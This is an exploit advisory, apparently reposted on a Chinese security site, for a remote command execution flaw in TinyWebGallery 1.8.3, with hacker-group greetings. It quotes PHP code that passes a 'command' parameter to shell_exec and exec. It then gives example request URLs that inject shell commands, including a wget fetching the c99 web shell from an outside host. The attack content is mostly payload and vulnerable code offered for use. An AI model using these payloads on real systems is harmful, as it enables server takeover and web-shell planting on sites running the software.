<======================================================> [»] TinyWebGallery 1.8.3 Remote Command Execution <======================================================> 作者: Expl0!Ts --------> My Best t34m -----> "BaC , RoBert MilEs , Bl4ck_ID" 软件地址: http://www.tinywebgallery.com/dl.php?file=twg_latest 测试平台wind xp !----- > THnKs T0 My ALLAH <::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::> bIG tHnkS T0 :-> vbspiders.com & Dz4all.com www.2cto.com & isecur1ty.org <::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::> <=================E测试====================> -=[ vuln c0de ]=- 1 1) --------------> filefunctions.inc : function execute_command ($command) { global $use_shell_exec; ob_start(); set_error_handler("on_error_no_output"); i f (substr(@php_uname(), 0, 7) == "Windows"){ // Make a new instance of the COM object $WshShell = new COM("WScript.Shell"); // Make the command window but dont show it. $oExec = $WshShell->Run("cmd /C " . $command, 0, true); } else { if ($use_shell_exec) { shell_exec($command); <--------------------------------------------- error 1) --------->示例: http://www.2cto.com /(patch)/inc/filefunctions.inc?command=<id>;<pwd>;<wget http://shell.org/c99.zip> -=[ vuln c0de ]=- 2 2) --------------> ifo.php : if ($use_shell_exec) { shell_exec($command); } else { exec($command . " > /dev/null"); <------------------------------------------ error 2) ---------> 示例: http://www.2cto.com /(patch)/info.php?command=<id>;<pwd>;<wget http://shell.org/c99.zip> <-------------------------------------------------------------------------------------------------------------------------------------------------------------------> 致谢: !> BaC ,!> Black_ID ,!> Kala$nikoV ,!> Robert miles ,!> Dr.Black_ID , !> AHmEd-HaMaImi , Bel-AiSa , To-KhAlEd <-------------------------------------------------------------------------------------------------------------------------------------------------------------------> EnJoY o_O
查看更多关于TinyWebGallery 1.8.3远程命令执行及修复 - 网站安全的详细内容...